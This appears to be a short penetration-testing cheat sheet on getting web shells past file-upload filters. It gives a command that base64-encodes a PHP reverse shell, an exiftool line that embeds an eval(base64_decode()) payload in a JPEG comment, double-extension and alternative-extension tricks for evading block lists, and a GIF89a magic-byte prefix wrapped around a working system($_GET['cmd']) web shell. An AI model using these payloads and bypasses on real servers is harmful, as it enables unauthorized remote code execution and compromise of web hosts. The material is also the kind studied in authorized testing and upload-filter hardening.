Converting Shell to Base64

We use the wrap flag set to 0 to force output on one line instead of column wrapping.

base64 -w 0 /usr/share/webshells/php/php-reverse-shell.php

Embedding in Image

We can embed a shell in an image with exiftool.

exiftool -Comment='<?php eval(base64_decode("<base64 string here>")); ?>' OIP.jpeg'

Bypass File Upload Filtering

One common way to gain a shell is actually not really a vulnerability, but a feature! Often times it is possible to upload files to the web server. This can be abused by just uploading a reverse shell. The ability to upload shells are often hindered by filters that try to filter out files that could potentially be malicious. So that is what we have to bypass.

Rename It

We can rename our shell and upload it as shell.php.jpg. It passed the filter and the file is executed as php.

Alternative File Extensions

Sometimes we can use alternative executable file extensions to bypass a block list of only commonly used file extensions.

PHP

.phtml
.php
.php3
.php4
.php5
.inc

ASP

.asp
.aspx

Perl

.pl
.pm
.cgi
.lib

Javascript

.jsp
.jspx
.jsw
.jsv
.jspf

ColdFusion

.cfm
.cfml
.cfc
.dbm

Change Magic Byte

If they check the content, you can change the "magic byte" of the file to trick the content check. For example, you can add the text "GIF89a;" before your shell-code to make the file appear to be an image. So it would look something like this:

GIF89a;
<?
system($_GET['cmd']);//or you can insert your complete shell code
?>

Cyber Security Notebook